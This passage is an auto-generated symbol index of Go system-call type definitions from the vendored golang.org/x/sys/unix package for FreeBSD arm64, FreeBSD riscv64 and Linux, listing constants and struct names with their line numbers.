RtMetrics (line 508) | type RtMetrics struct constant SizeofBpfVersion (line 524) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 525) | SizeofBpfStat = 0x8 constant SizeofBpfZbuf (line 526) | SizeofBpfZbuf = 0xc constant SizeofBpfProgram (line 527) | SizeofBpfProgram = 0x8 constant SizeofBpfInsn (line 528) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 529) | SizeofBpfHdr = 0x20 constant SizeofBpfZbufHeader (line 530) | SizeofBpfZbufHeader = 0x20 type BpfVersion (line 533) | type BpfVersion struct type BpfStat (line 538) | type BpfStat struct type BpfZbuf (line 543) | type BpfZbuf struct type BpfProgram (line 549) | type BpfProgram struct type BpfInsn (line 554) | type BpfInsn struct type BpfHdr (line 561) | type BpfHdr struct type BpfZbufHeader (line 569) | type BpfZbufHeader struct type Termios (line 576) | type Termios struct type Winsize (line 586) | type Winsize struct constant AT_FDCWD (line 594) | AT_FDCWD = -0x64 constant AT_EACCESS (line 595) | AT_EACCESS = 0x100 constant AT_SYMLINK_NOFOLLOW (line 596) | AT_SYMLINK_NOFOLLOW = 0x200 constant AT_SYMLINK_FOLLOW (line 597) | AT_SYMLINK_FOLLOW = 0x400 constant AT_REMOVEDIR (line 598) | AT_REMOVEDIR = 0x800 type PollFd (line 601) | type PollFd struct constant POLLERR (line 608) | POLLERR = 0x8 constant POLLHUP (line 609) | POLLHUP = 0x10 constant POLLIN (line 610) | POLLIN = 0x1 constant POLLINIGNEOF (line 611) | POLLINIGNEOF = 0x2000 constant POLLNVAL (line 612) | POLLNVAL = 0x20 constant POLLOUT (line 613) | POLLOUT = 0x4 constant POLLPRI (line 614) | POLLPRI = 0x2 constant POLLRDBAND (line 615) | POLLRDBAND = 0x80 constant POLLRDNORM (line 616) | POLLRDNORM = 0x40 constant POLLWRBAND (line 617) | POLLWRBAND = 0x100 constant POLLWRNORM (line 618) | POLLWRNORM = 0x4 type CapRights (line 621) | type CapRights struct type Utsname (line 625) | type Utsname struct constant SizeofClockinfo (line 633) | SizeofClockinfo = 0x14 type Clockinfo (line 635) | type Clockinfo struct FILE: vendor/golang.org/x/sys/unix/ztypes_freebsd_arm64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x8 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 type _C_short (line 17) | type _C_short type _C_int (line 18) | type _C_int type _C_long (line 19) | type _C_long type _C_long_long (line 20) | type _C_long_long type Timespec (line 23) | type Timespec struct type Timeval (line 28) | type Timeval struct type Time_t (line 33) | type Time_t type Rusage (line 35) | type Rusage struct type Rlimit (line 54) | type Rlimit struct type _Gid_t (line 59) | type _Gid_t constant _statfsVersion (line 62) | _statfsVersion = 0x20140518 constant _dirblksiz (line 63) | _dirblksiz = 0x400 type Stat_t (line 66) | type Stat_t struct type Statfs_t (line 88) | type Statfs_t struct type Flock_t (line 113) | type Flock_t struct type Dirent (line 123) | type Dirent struct type Fsid (line 134) | type Fsid struct constant PathMax (line 139) | PathMax = 0x400 constant FADV_NORMAL (line 143) | FADV_NORMAL = 0x0 constant FADV_RANDOM (line 144) | FADV_RANDOM = 0x1 constant FADV_SEQUENTIAL (line 145) | FADV_SEQUENTIAL = 0x2 constant FADV_WILLNEED (line 146) | FADV_WILLNEED = 0x3 constant FADV_DONTNEED (line 147) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 148) | FADV_NOREUSE = 0x5 type RawSockaddrInet4 (line 151) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 159) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 168) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 174) | type RawSockaddrDatalink struct type RawSockaddr (line 185) | type RawSockaddr struct type RawSockaddrAny (line 191) | type RawSockaddrAny struct type _Socklen (line 196) | type _Socklen type Xucred (line 198) | type Xucred struct type Linger (line 206) | type Linger struct type Iovec (line 211) | type Iovec struct type IPMreq (line 216) | type IPMreq struct type IPMreqn (line 221) | type IPMreqn struct type IPv6Mreq (line 227) | type IPv6Mreq struct type Msghdr (line 232) | type Msghdr struct type Cmsghdr (line 242) | type Cmsghdr struct type Inet6Pktinfo (line 248) | type Inet6Pktinfo struct type IPv6MTUInfo (line 253) | type IPv6MTUInfo struct type ICMPv6Filter (line 258) | type ICMPv6Filter struct constant SizeofSockaddrInet4 (line 263) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 264) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 265) | SizeofSockaddrAny = 0x6c constant SizeofSockaddrUnix (line 266) | SizeofSockaddrUnix = 0x6a constant SizeofSockaddrDatalink (line 267) | SizeofSockaddrDatalink = 0x36 constant SizeofXucred (line 268) | SizeofXucred = 0x58 constant SizeofLinger (line 269) | SizeofLinger = 0x8 constant SizeofIovec (line 270) | SizeofIovec = 0x10 constant SizeofIPMreq (line 271) | SizeofIPMreq = 0x8 constant SizeofIPMreqn (line 272) | SizeofIPMreqn = 0xc constant SizeofIPv6Mreq (line 273) | SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 274) | SizeofMsghdr = 0x30 constant SizeofCmsghdr (line 275) | SizeofCmsghdr = 0xc constant SizeofInet6Pktinfo (line 276) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 277) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 278) | SizeofICMPv6Filter = 0x20 constant PTRACE_TRACEME (line 282) | PTRACE_TRACEME = 0x0 constant PTRACE_CONT (line 283) | PTRACE_CONT = 0x7 constant PTRACE_KILL (line 284) | PTRACE_KILL = 0x8 type PtraceLwpInfoStruct (line 287) | type PtraceLwpInfoStruct struct type __Siginfo (line 300) | type __Siginfo struct type __PtraceSiginfo (line 312) | type __PtraceSiginfo struct type Sigset_t (line 324) | type Sigset_t struct type Reg (line 328) | type Reg struct type FpReg (line 337) | type FpReg struct type FpExtendedPrecision (line 344) | type FpExtendedPrecision struct type PtraceIoDesc (line 346) | type PtraceIoDesc struct type Kevent_t (line 353) | type Kevent_t struct type FdSet (line 363) | type FdSet struct constant sizeofIfMsghdr (line 368) | sizeofIfMsghdr = 0xa8 constant SizeofIfMsghdr (line 369) | SizeofIfMsghdr = 0xa8 constant sizeofIfData (line 370) | sizeofIfData = 0x98 constant SizeofIfData (line 371) | SizeofIfData = 0x98 constant SizeofIfaMsghdr (line 372) | SizeofIfaMsghdr = 0x14 constant SizeofIfmaMsghdr (line 373) | SizeofIfmaMsghdr = 0x10 constant SizeofIfAnnounceMsghdr (line 374) | SizeofIfAnnounceMsghdr = 0x18 constant SizeofRtMsghdr (line 375) | SizeofRtMsghdr = 0x98 constant SizeofRtMetrics (line 376) | SizeofRtMetrics = 0x70 type ifMsghdr (line 379) | type ifMsghdr struct type IfMsghdr (line 390) | type IfMsghdr struct type ifData (line 400) | type ifData struct type IfData (line 428) | type IfData struct type IfaMsghdr (line 456) | type IfaMsghdr struct type IfmaMsghdr (line 467) | type IfmaMsghdr struct type IfAnnounceMsghdr (line 477) | type IfAnnounceMsghdr struct type RtMsghdr (line 486) | type RtMsghdr struct type RtMetrics (line 502) | type RtMetrics struct constant SizeofBpfVersion (line 518) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 519) | SizeofBpfStat = 0x8 constant SizeofBpfZbuf (line 520) | SizeofBpfZbuf = 0x18 constant SizeofBpfProgram (line 521) | SizeofBpfProgram = 0x10 constant SizeofBpfInsn (line 522) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 523) | SizeofBpfHdr = 0x20 constant SizeofBpfZbufHeader (line 524) | SizeofBpfZbufHeader = 0x20 type BpfVersion (line 527) | type BpfVersion struct type BpfStat (line 532) | type BpfStat struct type BpfZbuf (line 537) | type BpfZbuf struct type BpfProgram (line 543) | type BpfProgram struct type BpfInsn (line 548) | type BpfInsn struct type BpfHdr (line 555) | type BpfHdr struct type BpfZbufHeader (line 563) | type BpfZbufHeader struct type Termios (line 570) | type Termios struct type Winsize (line 580) | type Winsize struct constant AT_FDCWD (line 588) | AT_FDCWD = -0x64 constant AT_EACCESS (line 589) | AT_EACCESS = 0x100 constant AT_SYMLINK_NOFOLLOW (line 590) | AT_SYMLINK_NOFOLLOW = 0x200 constant AT_SYMLINK_FOLLOW (line 591) | AT_SYMLINK_FOLLOW = 0x400 constant AT_REMOVEDIR (line 592) | AT_REMOVEDIR = 0x800 type PollFd (line 595) | type PollFd struct constant POLLERR (line 602) | POLLERR = 0x8 constant POLLHUP (line 603) | POLLHUP = 0x10 constant POLLIN (line 604) | POLLIN = 0x1 constant POLLINIGNEOF (line 605) | POLLINIGNEOF = 0x2000 constant POLLNVAL (line 606) | POLLNVAL = 0x20 constant POLLOUT (line 607) | POLLOUT = 0x4 constant POLLPRI (line 608) | POLLPRI = 0x2 constant POLLRDBAND (line 609) | POLLRDBAND = 0x80 constant POLLRDNORM (line 610) | POLLRDNORM = 0x40 constant POLLWRBAND (line 611) | POLLWRBAND = 0x100 constant POLLWRNORM (line 612) | POLLWRNORM = 0x4 type CapRights (line 615) | type CapRights struct type Utsname (line 619) | type Utsname struct constant SizeofClockinfo (line 627) | SizeofClockinfo = 0x14 type Clockinfo (line 629) | type Clockinfo struct FILE: vendor/golang.org/x/sys/unix/ztypes_freebsd_riscv64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x8 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 type _C_short (line 17) | type _C_short type _C_int (line 18) | type _C_int type _C_long (line 19) | type _C_long type _C_long_long (line 20) | type _C_long_long type Timespec (line 23) | type Timespec struct type Timeval (line 28) | type Timeval struct type Time_t (line 33) | type Time_t type Rusage (line 35) | type Rusage struct type Rlimit (line 54) | type Rlimit struct type _Gid_t (line 59) | type _Gid_t constant _statfsVersion (line 62) | _statfsVersion = 0x20140518 constant _dirblksiz (line 63) | _dirblksiz = 0x400 type Stat_t (line 66) | type Stat_t struct type Statfs_t (line 88) | type Statfs_t struct type Flock_t (line 113) | type Flock_t struct type Dirent (line 123) | type Dirent struct type Fsid (line 134) | type Fsid struct constant PathMax (line 139) | PathMax = 0x400 constant FADV_NORMAL (line 143) | FADV_NORMAL = 0x0 constant FADV_RANDOM (line 144) | FADV_RANDOM = 0x1 constant FADV_SEQUENTIAL (line 145) | FADV_SEQUENTIAL = 0x2 constant FADV_WILLNEED (line 146) | FADV_WILLNEED = 0x3 constant FADV_DONTNEED (line 147) | FADV_DONTNEED = 0x4 constant FADV_NOREUSE (line 148) | FADV_NOREUSE = 0x5 type RawSockaddrInet4 (line 151) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 159) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 168) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 174) | type RawSockaddrDatalink struct type RawSockaddr (line 185) | type RawSockaddr struct type RawSockaddrAny (line 191) | type RawSockaddrAny struct type _Socklen (line 196) | type _Socklen type Xucred (line 198) | type Xucred struct type Linger (line 206) | type Linger struct type Iovec (line 211) | type Iovec struct type IPMreq (line 216) | type IPMreq struct type IPMreqn (line 221) | type IPMreqn struct type IPv6Mreq (line 227) | type IPv6Mreq struct type Msghdr (line 232) | type Msghdr struct type Cmsghdr (line 242) | type Cmsghdr struct type Inet6Pktinfo (line 248) | type Inet6Pktinfo struct type IPv6MTUInfo (line 253) | type IPv6MTUInfo struct type ICMPv6Filter (line 258) | type ICMPv6Filter struct constant SizeofSockaddrInet4 (line 263) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 264) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 265) | SizeofSockaddrAny = 0x6c constant SizeofSockaddrUnix (line 266) | SizeofSockaddrUnix = 0x6a constant SizeofSockaddrDatalink (line 267) | SizeofSockaddrDatalink = 0x36 constant SizeofXucred (line 268) | SizeofXucred = 0x58 constant SizeofLinger (line 269) | SizeofLinger = 0x8 constant SizeofIovec (line 270) | SizeofIovec = 0x10 constant SizeofIPMreq (line 271) | SizeofIPMreq = 0x8 constant SizeofIPMreqn (line 272) | SizeofIPMreqn = 0xc constant SizeofIPv6Mreq (line 273) | SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 274) | SizeofMsghdr = 0x30 constant SizeofCmsghdr (line 275) | SizeofCmsghdr = 0xc constant SizeofInet6Pktinfo (line 276) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 277) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 278) | SizeofICMPv6Filter = 0x20 constant PTRACE_TRACEME (line 282) | PTRACE_TRACEME = 0x0 constant PTRACE_CONT (line 283) | PTRACE_CONT = 0x7 constant PTRACE_KILL (line 284) | PTRACE_KILL = 0x8 type PtraceLwpInfoStruct (line 287) | type PtraceLwpInfoStruct struct type __Siginfo (line 300) | type __Siginfo struct type __PtraceSiginfo (line 312) | type __PtraceSiginfo struct type Sigset_t (line 324) | type Sigset_t struct type Reg (line 328) | type Reg struct type FpReg (line 340) | type FpReg struct type FpExtendedPrecision (line 345) | type FpExtendedPrecision struct type PtraceIoDesc (line 347) | type PtraceIoDesc struct type Kevent_t (line 354) | type Kevent_t struct type FdSet (line 364) | type FdSet struct constant sizeofIfMsghdr (line 369) | sizeofIfMsghdr = 0xa8 constant SizeofIfMsghdr (line 370) | SizeofIfMsghdr = 0xa8 constant sizeofIfData (line 371) | sizeofIfData = 0x98 constant SizeofIfData (line 372) | SizeofIfData = 0x98 constant SizeofIfaMsghdr (line 373) | SizeofIfaMsghdr = 0x14 constant SizeofIfmaMsghdr (line 374) | SizeofIfmaMsghdr = 0x10 constant SizeofIfAnnounceMsghdr (line 375) | SizeofIfAnnounceMsghdr = 0x18 constant SizeofRtMsghdr (line 376) | SizeofRtMsghdr = 0x98 constant SizeofRtMetrics (line 377) | SizeofRtMetrics = 0x70 type ifMsghdr (line 380) | type ifMsghdr struct type IfMsghdr (line 391) | type IfMsghdr struct type ifData (line 401) | type ifData struct type IfData (line 429) | type IfData struct type IfaMsghdr (line 457) | type IfaMsghdr struct type IfmaMsghdr (line 468) | type IfmaMsghdr struct type IfAnnounceMsghdr (line 478) | type IfAnnounceMsghdr struct type RtMsghdr (line 487) | type RtMsghdr struct type RtMetrics (line 503) | type RtMetrics struct constant SizeofBpfVersion (line 520) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 521) | SizeofBpfStat = 0x8 constant SizeofBpfZbuf (line 522) | SizeofBpfZbuf = 0x18 constant SizeofBpfProgram (line 523) | SizeofBpfProgram = 0x10 constant SizeofBpfInsn (line 524) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 525) | SizeofBpfHdr = 0x20 constant SizeofBpfZbufHeader (line 526) | SizeofBpfZbufHeader = 0x20 type BpfVersion (line 529) | type BpfVersion struct type BpfStat (line 534) | type BpfStat struct type BpfZbuf (line 539) | type BpfZbuf struct type BpfProgram (line 545) | type BpfProgram struct type BpfInsn (line 550) | type BpfInsn struct type BpfHdr (line 557) | type BpfHdr struct type BpfZbufHeader (line 565) | type BpfZbufHeader struct type Termios (line 572) | type Termios struct type Winsize (line 582) | type Winsize struct constant AT_FDCWD (line 590) | AT_FDCWD = -0x64 constant AT_EACCESS (line 591) | AT_EACCESS = 0x100 constant AT_SYMLINK_NOFOLLOW (line 592) | AT_SYMLINK_NOFOLLOW = 0x200 constant AT_SYMLINK_FOLLOW (line 593) | AT_SYMLINK_FOLLOW = 0x400 constant AT_REMOVEDIR (line 594) | AT_REMOVEDIR = 0x800 type PollFd (line 597) | type PollFd struct constant POLLERR (line 604) | POLLERR = 0x8 constant POLLHUP (line 605) | POLLHUP = 0x10 constant POLLIN (line 606) | POLLIN = 0x1 constant POLLINIGNEOF (line 607) | POLLINIGNEOF = 0x2000 constant POLLNVAL (line 608) | POLLNVAL = 0x20 constant POLLOUT (line 609) | POLLOUT = 0x4 constant POLLPRI (line 610) | POLLPRI = 0x2 constant POLLRDBAND (line 611) | POLLRDBAND = 0x80 constant POLLRDNORM (line 612) | POLLRDNORM = 0x40 constant POLLWRBAND (line 613) | POLLWRBAND = 0x100 constant POLLWRNORM (line 614) | POLLWRNORM = 0x4 type CapRights (line 617) | type CapRights struct type Utsname (line 621) | type Utsname struct constant SizeofClockinfo (line 629) | SizeofClockinfo = 0x14 type Clockinfo (line 631) | type Clockinfo struct FILE: vendor/golang.org/x/sys/unix/ztypes_linux.go constant SizeofShort (line 8) | SizeofShort = 0x2 constant SizeofInt (line 9) | SizeofInt = 0x4 constant SizeofLongLong (line 10) | SizeofLongLong = 0x8 constant PathMax (line 11) | PathMax = 0x1000 type _C_short (line 15) | type _C_short type _C_int (line 16) | type _C_int type _C_long_long (line 18) | type _C_long_long type ItimerSpec (line 21) | type ItimerSpec struct type Itimerval (line 26) | type Itimerval struct constant ADJ_OFFSET (line 32) | ADJ_OFFSET = 0x1 constant ADJ_FREQUENCY (line 33) | ADJ_FREQUENCY = 0x2 constant ADJ_MAXERROR (line 34) | ADJ_MAXERROR = 0x4 constant ADJ_ESTERROR (line 35) | ADJ_ESTERROR = 0x8 constant ADJ_STATUS (line 36) | ADJ_STATUS = 0x10 constant ADJ_TIMECONST (line 37) | ADJ_TIMECONST = 0x20 constant ADJ_TAI (line 38) | ADJ_TAI = 0x80 constant ADJ_SETOFFSET (line 39) | ADJ_SETOFFSET = 0x100 constant ADJ_MICRO (line 40) | ADJ_MICRO = 0x1000 constant ADJ_NANO (line 41) | ADJ_NANO = 0x2000 constant ADJ_TICK (line 42) | ADJ_TICK = 0x4000 constant ADJ_OFFSET_SINGLESHOT (line 43) | ADJ_OFFSET_SINGLESHOT = 0x8001 constant ADJ_OFFSET_SS_READ (line 44) | ADJ_OFFSET_SS_READ = 0xa001 constant STA_PLL (line 48) | STA_PLL = 0x1 constant STA_PPSFREQ (line 49) | STA_PPSFREQ = 0x2 constant STA_PPSTIME (line 50) | STA_PPSTIME = 0x4 constant STA_FLL (line 51) | STA_FLL = 0x8 constant STA_INS (line 52) | STA_INS = 0x10 constant STA_DEL (line 53) | STA_DEL = 0x20 constant STA_UNSYNC (line 54) | STA_UNSYNC = 0x40 constant STA_FREQHOLD (line 55) | STA_FREQHOLD = 0x80 constant STA_PPSSIGNAL (line 56) | STA_PPSSIGNAL = 0x100 constant STA_PPSJITTER (line 57) | STA_PPSJITTER = 0x200 constant STA_PPSWANDER (line 58) | STA_PPSWANDER = 0x400 constant STA_PPSERROR (line 59) | STA_PPSERROR = 0x800 constant STA_CLOCKERR (line 60) | STA_CLOCKERR = 0x1000 constant STA_NANO (line 61) | STA_NANO = 0x2000 constant STA_MODE (line 62) | STA_MODE = 0x4000 constant STA_CLK (line 63) | STA_CLK = 0x8000 constant TIME_OK (line 67) | TIME_OK = 0x0 constant TIME_INS (line 68) | TIME_INS = 0x1 constant TIME_DEL (line 69) | TIME_DEL = 0x2 constant TIME_OOP (line 70) | TIME_OOP = 0x3 constant TIME_WAIT (line 71) | TIME_WAIT = 0x4 constant TIME_ERROR (line 72) | TIME_ERROR = 0x5 constant TIME_BAD (line 73) | TIME_BAD = 0x5 type Rlimit (line 76) | type Rlimit struct type _Gid_t (line 81) | type _Gid_t type StatxTimestamp (line 83) | type StatxTimestamp struct type Statx_t (line 89) | type Statx_t struct type Fsid (line 116) | type Fsid struct type FileCloneRange (line 120) | type FileCloneRange struct type RawFileDedupeRange (line 127) | type RawFileDedupeRange struct type RawFileDedupeRangeInfo (line 135) | type RawFileDedupeRangeInfo struct constant SizeofRawFileDedupeRange (line 144) | SizeofRawFileDedupeRange = 0x18 constant SizeofRawFileDedupeRangeInfo (line 145) | SizeofRawFileDedupeRangeInfo = 0x20 constant FILE_DEDUPE_RANGE_SAME (line 146) | FILE_DEDUPE_RANGE_SAME = 0x0 constant FILE_DEDUPE_RANGE_DIFFERS (line 147) | FILE_DEDUPE_RANGE_DIFFERS = 0x1 type FscryptPolicy (line 150) | type FscryptPolicy struct type FscryptKey (line 158) | type FscryptKey struct type FscryptPolicyV1 (line 164) | type FscryptPolicyV1 struct type FscryptPolicyV2 (line 172) | type FscryptPolicyV2 struct type FscryptGetPolicyExArg (line 182) | type FscryptGetPolicyExArg struct type FscryptKeySpecifier (line 187) | type FscryptKeySpecifier struct type FscryptAddKeyArg (line 193) | type FscryptAddKeyArg struct type FscryptRemoveKeyArg (line 200) | type FscryptRemoveKeyArg struct type FscryptGetKeyStatusArg (line 206) | type FscryptGetKeyStatusArg struct type DmIoctl (line 215) | type DmIoctl struct type DmTargetSpec (line 230) | type DmTargetSpec struct type DmTargetDeps (line 238) | type DmTargetDeps struct type DmTargetVersions (line 243) | type DmTargetVersions struct type DmTargetMsg (line 248) | type DmTargetMsg struct constant SizeofDmIoctl (line 253) | SizeofDmIoctl = 0x138 constant SizeofDmTargetSpec (line 254) | SizeofDmTargetSpec = 0x28 type KeyctlDHParams (line 257) | type KeyctlDHParams struct constant FADV_NORMAL (line 264) | FADV_NORMAL = 0x0 constant FADV_RANDOM (line 265) | FADV_RANDOM = 0x1 constant FADV_SEQUENTIAL (line 266) | FADV_SEQUENTIAL = 0x2 constant FADV_WILLNEED (line 267) | FADV_WILLNEED = 0x3 type RawSockaddrInet4 (line 270) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 277) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 285) | type RawSockaddrUnix struct type RawSockaddrLinklayer (line 290) | type RawSockaddrLinklayer struct type RawSockaddrNetlink (line 300) | type RawSockaddrNetlink struct type RawSockaddrHCI (line 307) | type RawSockaddrHCI struct type RawSockaddrL2 (line 313) | type RawSockaddrL2 struct type RawSockaddrRFCOMM (line 322) | type RawSockaddrRFCOMM struct type RawSockaddrCAN (line 329) | type RawSockaddrCAN struct type RawSockaddrALG (line 335) | type RawSockaddrALG struct type RawSockaddrVM (line 343) | type RawSockaddrVM struct type RawSockaddrXDP (line 352) | type RawSockaddrXDP struct type RawSockaddrPPPoX (line 360) | type RawSockaddrPPPoX type RawSockaddrTIPC (line 362) | type RawSockaddrTIPC struct type RawSockaddrL2TPIP (line 369) | type RawSockaddrL2TPIP struct type RawSockaddrL2TPIP6 (line 377) | type RawSockaddrL2TPIP6 struct type RawSockaddrIUCV (line 386) | type RawSockaddrIUCV struct type RawSockaddrNFC (line 395) | type RawSockaddrNFC struct type _Socklen (line 402) | type _Socklen type Linger (line 404) | type Linger struct type IPMreq (line 409) | type IPMreq struct type IPMreqn (line 414) | type IPMreqn struct type IPv6Mreq (line 420) | type IPv6Mreq struct type PacketMreq (line 425) | type PacketMreq struct type Inet4Pktinfo (line 432) | type Inet4Pktinfo struct type Inet6Pktinfo (line 438) | type Inet6Pktinfo struct type IPv6MTUInfo (line 443) | type IPv6MTUInfo struct type ICMPv6Filter (line 448) | type ICMPv6Filter struct type Ucred (line 452) | type Ucred struct type TCPInfo (line 458) | type TCPInfo struct type CanFilter (line 518) | type CanFilter struct type TCPRepairOpt (line 523) | type TCPRepairOpt struct constant SizeofSockaddrInet4 (line 529) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 530) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 531) | SizeofSockaddrAny = 0x70 constant SizeofSockaddrUnix (line 532) | SizeofSockaddrUnix = 0x6e constant SizeofSockaddrLinklayer (line 533) | SizeofSockaddrLinklayer = 0x14 constant SizeofSockaddrNetlink (line 534) | SizeofSockaddrNetlink = 0xc constant SizeofSockaddrHCI (line 535) | SizeofSockaddrHCI = 0x6 constant SizeofSockaddrL2 (line 536) | SizeofSockaddrL2 = 0xe constant SizeofSockaddrRFCOMM (line 537) | SizeofSockaddrRFCOMM = 0xa constant SizeofSockaddrCAN (line 538) | SizeofSockaddrCAN = 0x18 constant SizeofSockaddrALG (line 539) | SizeofSockaddrALG = 0x58 constant SizeofSockaddrVM (line 540) | SizeofSockaddrVM = 0x10 constant SizeofSockaddrXDP (line 541) | SizeofSockaddrXDP = 0x10 constant SizeofSockaddrPPPoX (line 542) | SizeofSockaddrPPPoX = 0x1e constant SizeofSockaddrTIPC (line 543) | SizeofSockaddrTIPC = 0x10 constant SizeofSockaddrL2TPIP (line 544) | SizeofSockaddrL2TPIP = 0x10 constant SizeofSockaddrL2TPIP6 (line 545) | SizeofSockaddrL2TPIP6 = 0x20 constant SizeofSockaddrIUCV (line 546) | SizeofSockaddrIUCV = 0x20 constant SizeofSockaddrNFC (line 547) | SizeofSockaddrNFC = 0x10 constant SizeofLinger (line 548) | SizeofLinger = 0x8 constant SizeofIPMreq (line 549) | SizeofIPMreq = 0x8 constant SizeofIPMreqn (line 550) | SizeofIPMreqn = 0xc constant SizeofIPv6Mreq (line 551) | SizeofIPv6Mreq = 0x14 constant SizeofPacketMreq (line 552) | SizeofPacketMreq = 0x10 constant SizeofInet4Pktinfo (line 553) | SizeofInet4Pktinfo = 0xc constant SizeofInet6Pktinfo (line 554) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 555) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 556) | SizeofICMPv6Filter = 0x20 constant SizeofUcred (line 557) | SizeofUcred = 0xc constant SizeofTCPInfo (line 558) | SizeofTCPInfo = 0xf8 constant SizeofCanFilter (line 559) | SizeofCanFilter = 0x8 constant SizeofTCPRepairOpt (line 560) | SizeofTCPRepairOpt = 0x8 constant NDA_UNSPEC (line 564) | NDA_UNSPEC = 0x0 constant NDA_DST (line 565) | NDA_DST = 0x1 constant NDA_LLADDR (line 566) | NDA_LLADDR = 0x2 constant NDA_CACHEINFO (line 567) | NDA_CACHEINFO = 0x3 constant NDA_PROBES (line 568) | NDA_PROBES = 0x4 constant NDA_VLAN (line 569) | NDA_VLAN = 0x5 constant NDA_PORT (line 570) | NDA_PORT = 0x6 constant NDA_VNI (line 571) | NDA_VNI = 0x7 constant NDA_IFINDEX (line 572) | NDA_IFINDEX = 0x8 constant NDA_MASTER (line 573) | NDA_MASTER = 0x9 constant NDA_LINK_NETNSID (line 574) | NDA_LINK_NETNSID = 0xa constant NDA_SRC_VNI (line 575) | NDA_SRC_VNI = 0xb constant NTF_USE (line 576) | NTF_USE = 0x1 constant NTF_SELF (line 577) | NTF_SELF = 0x2 constant NTF_MASTER (line 578) | NTF_MASTER = 0x4 constant NTF_PROXY (line 579) | NTF_PROXY = 0x8 constant NTF_EXT_LEARNED (line 580) | NTF_EXT_LEARNED = 0x10 constant NTF_OFFLOADED (line 581) | NTF_OFFLOADED = 0x20 constant NTF_ROUTER (line 582) | NTF_ROUTER = 0x80 constant NUD_INCOMPLETE (line 583) | NUD_INCOMPLETE = 0x1 constant NUD_REACHABLE (line 584) | NUD_REACHABLE = 0x2 constant NUD_STALE (line 585) | NUD_STALE = 0x4 constant NUD_DELAY (line 586) | NUD_DELAY = 0x8 constant NUD_PROBE (line 587) | NUD_PROBE = 0x10 constant NUD_FAILED (line 588) | NUD_FAILED = 0x20 constant NUD_NOARP (line 589) | NUD_NOARP = 0x40 constant NUD_PERMANENT (line 590) | NUD_PERMANENT = 0x80 constant NUD_NONE (line 591) | NUD_NONE = 0x0 constant IFA_UNSPEC (line 592) | IFA_UNSPEC = 0x0 constant IFA_ADDRESS (line 593) | IFA_ADDRESS = 0x1 constant IFA_LOCAL (line 594) | IFA_LOCAL = 0x2 constant IFA_LABEL (line 595) | IFA_LABEL = 0x3 constant IFA_BROADCAST (line 596) | IFA_BROADCAST = 0x4 constant IFA_ANYCAST (line 597) | IFA_ANYCAST = 0x5 constant IFA_CACHEINFO (line 598) | IFA_CACHEINFO = 0x6 constant IFA_MULTICAST (line 599) | IFA_MULTICAST = 0x7 constant IFA_FLAGS (line 600) | IFA_FLAGS = 0x8 constant IFA_RT_PRIORITY (line 601) | IFA_RT_PRIORITY = 0x9 constant IFA_TARGET_NETNSID (line 602) | IFA_TARGET_NETNSID = 0xa constant RT_SCOPE_UNIVERSE (line 603) | RT_SCOPE_UNIVERSE = 0x0 constant RT_SCOPE_SITE (line 604) | RT_SCOPE_SITE = 0xc8 constant RT_SCOPE_LINK (line 605) | RT_SCOPE_LINK = 0xfd constant RT_SCOPE_HOST (line 606) | RT_SCOPE_HOST = 0xfe constant RT_SCOPE_NOWHERE (line 607) | RT_SCOPE_NOWHERE = 0xff constant RT_TABLE_UNSPEC (line 608) | RT_TABLE_UNSPEC = 0x0 constant RT_TABLE_COMPAT (line 609) | RT_TABLE_COMPAT = 0xfc constant RT_TABLE_DEFAULT (line 610) | RT_TABLE_DEFAULT = 0xfd constant RT_TABLE_MAIN (line 611) | RT_TABLE_MAIN = 0xfe constant RT_TABLE_LOCAL (line 612) | RT_TABLE_LOCAL = 0xff constant RT_TABLE_MAX (line 613) | RT_TABLE_MAX = 0xffffffff constant RTA_UNSPEC (line 614) | RTA_UNSPEC = 0x0 constant RTA_DST (line 615) | RTA_DST = 0x1 constant RTA_SRC (line 616) | RTA_SRC = 0x2 constant RTA_IIF (line 617) | RTA_IIF = 0x3 constant RTA_OIF (line 618) | RTA_OIF = 0x4 constant RTA_GATEWAY (line 619) | RTA_GATEWAY = 0x5 constant RTA_PRIORITY (line 620) | RTA_PRIORITY = 0x6 constant RTA_PREFSRC (line 621) | RTA_PREFSRC = 0x7 constant RTA_METRICS (line 622) | RTA_METRICS = 0x8 constant RTA_MULTIPATH (line 623) | RTA_MULTIPATH = 0x9 constant 